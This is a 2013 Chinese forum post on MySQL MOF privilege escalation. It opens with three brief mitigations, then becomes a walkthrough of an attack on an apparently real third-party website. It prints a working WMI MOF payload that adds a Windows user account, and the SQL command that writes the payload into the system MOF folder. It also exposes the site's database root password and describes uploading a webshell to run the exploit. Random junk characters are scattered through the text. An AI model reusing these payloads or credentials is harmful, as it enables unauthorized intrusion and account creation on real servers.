Mysql mof扩展漏洞防范方法
: W& e' \% s& I
2 ^% {; K/ |9 N$ W" l网上公开的一些利用代码:
2 Z3 J6 B+ {' P, j
! b( V% Z( Q( E3 {#pragma namespace(“\\\\.\\root\\subscription”)0 I5 I, Q' B% l
; h% {! I) B' I. [- c: kinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
% v, P e* b, {4 X# E8 O) w* c7 E, A5 l0 H
$ `5 i+ g7 u5 |3 X8 U
5 `) _; q0 _ H3 P) Z
5 \ N+ f: ?5 p5 U+ U. j, ?) H1 J: H0 o9 q" E; ]+ N# r
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
4 ~ E# } M2 ~+ a从上面代码来看得出解决办法:
: ]$ X/ i2 X) e; N% J9 }1 @* ^6 E* L6 b& h
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数* O5 G3 \( @- P, Q
$ n1 _0 h) ~( \2、禁止使用”WScript.Shel”组件
! ]! }3 L+ {) [7 m" s$ P$ R1 x# M1 p- A4 u/ c% ^+ i; [# p; H
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
2 G, V+ j) f6 _& T( T/ c Y8 k! d$ i, R7 j
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
1 m& @2 ~! }0 y1 V9 [* N0 t
, |+ t; y4 q4 C事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
% N5 ]% }; h) f/ A
9 x+ z; R& w( v: M+ x但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容& |3 I% ]: x0 w( P/ t y9 W) q
: M; Y1 e# ^ b0 V% M2 A9 c, @看懂了后就开始练手吧 M& f6 [) N3 T
. L0 Y7 G- y' p0 K" y# C6 ^
http://www.webbmw.com/config/config_ucenter.php 一句话 a9 ` _. Z9 k. t7 z! q% ~- T
7 g/ u8 X0 s; W. A
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
/ Q3 J L8 s6 d$ c
2 x/ ^, ~. ?; Q, |6 l于是直接用菜刀开搞
* m' c5 L' v& C( W( ^* T, K4 d& z. W3 \" E7 _ _. J" U
上马先
8 `! z# D4 d* v+ D ?5 S8 c. o/ M/ M
既然有了那些账号 之类的 于是我们就执行吧…….9 ^5 S+ Z) P" @& p3 N+ z
4 Z& A8 W: E; V- T9 d* f小小的说下
# X' k, T% V1 v0 _! F! Q5 R1 Z9 \) ?0 s
在这里第1次执行未成功 原因未知; w- s* E" }' p+ H$ ? H
/ z+ A% v8 {5 p) x( l我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
" j5 C9 n* O0 B# d* f: s; y) j& H( {* c/ R6 Z$ x
#pragma namespace(“\\\\.\\root\\subscription”)% w5 l5 E d; ?
& [* v( b) p; \5 a Uinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
7 n- y; d. J1 N: F. W( a
; }- C1 E6 @9 q) u我是将文件放到C:\WINDOWS\temp\1.mof
- I' r5 B5 l- ?, F$ b& E- z/ e7 \
- b$ w# j# R6 q' c' F4 p所以我们就改下执行的代码
" P! E, G, Z/ [7 q! o9 r
' s, Y$ u9 B+ O: ?$ hselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
+ \6 K- ~# g0 P
8 Q4 v8 [+ v4 V* l- J% u8 `- M0 j3 Q+ i% o; ^( R% `
, I; m- z% N" z; z3 L7 ]* f$ u1 | }. R
但是 你会发现账号还是没有躺在那里。。
8 _4 i. l+ W+ m, h* ]3 a# D, {4 j a1 q' O
于是我就感觉蛋疼
6 \' o3 R8 Q1 h; D; y( T0 t8 F' J p) k0 |7 n; O) n2 }
就去一个一个去执行 但是执行到第2个 mysql时就成功了………
0 n" a2 K* r8 ~ }% U( e) `7 T5 {* E1 ?, p# y
$ p; Q- ~6 T5 h8 R- q z
n. [* y, c/ D但是其他库均不成功…
% E9 t7 A' }' x
3 U% ]5 _8 u; N0 {7 L, |* d, @我就很费解呀 到底为什么不成功求大牛解答…9 U3 g0 V+ I: u& F* M
# b# u$ c: W8 \( j# F
. W" X$ G6 q: m( [' D7 ^+ ?( M! o- z) ^ c' k: w$ U0 S
|
发表于 2013-1-4 19:49:49
收藏
支持
反对